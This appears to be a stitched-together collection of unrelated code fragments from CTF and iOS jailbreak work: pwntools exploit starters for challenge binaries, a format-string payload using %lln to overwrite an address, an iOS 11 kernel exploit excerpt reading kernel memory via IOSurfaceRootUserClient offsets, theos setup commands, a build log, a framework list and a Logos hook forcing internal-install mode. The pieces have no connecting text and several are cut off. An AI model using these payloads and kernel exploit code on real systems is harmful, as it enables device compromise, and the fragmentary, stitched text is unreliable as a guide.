```python
from pwn import remote
from pwn import p64, p32
DEVICE_ID = ''
conn = remote('c.sk8.dog', 30001)
conn.send(f'CONNECT challenge.{DEVICE_ID}:1337 HTTP/1.1\n\n'.encode())
[conn.recvline() for _ in range(3)]  # consume HTTP response status line / headers
win_line = conn.recvline()
win_addr = win_line.split(b"number ")[1].split(b"!")[0]
```
```python
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
```
Added:

- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
```python
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x"  # What we are writing
payload += "%{}$lln"  # How we write it
payload += "\x30\x0d\x60"  # Where we write it
payload = payload.format(10)
```
```c
/*
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
*/
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
```
```bash
brew install dpkg ldid
cd ~
git clone --recursive https://github.com/theos/theos.git
echo "export THEOS=~/theos" >> .bash_profile
```
```
Showing All Messages
Build target Limitless of project Limitless with configuration Debug
PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/Limitless.build/Debug-iphoneos/Limitless.build/Script-FA25322E1DE0FB2800D4FA86.sh
cd /Volumes/Files/Developer/Limitless
export ACTION=build
export AD_HOC_CODE_SIGNING_ALLOWED=NO
export ALTERNATE_GROUP=staff
```
```objc
...
@property (strong, nonatomic) NSString *currentPhoneNumber;
...
-(NSMutableArray*)getHiddenNumbers {
    NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"];
    if (hiddenNumbers == nil) {
        return [[NSMutableArray alloc] init];
    }
    return [NSMutableArray arrayWithArray:hiddenNumbers];
```
- SBUIController - NO (Protected by FrontBoard)
- SBIconController - NO (Protected by FrontBoard)
- SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen])
- SBWallpaperController - NO (Protected by FrontBoard)
- SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time)
```logos
%hook BSPlatform
- (BOOL)isInternalInstall {
    return YES;
}
%end
```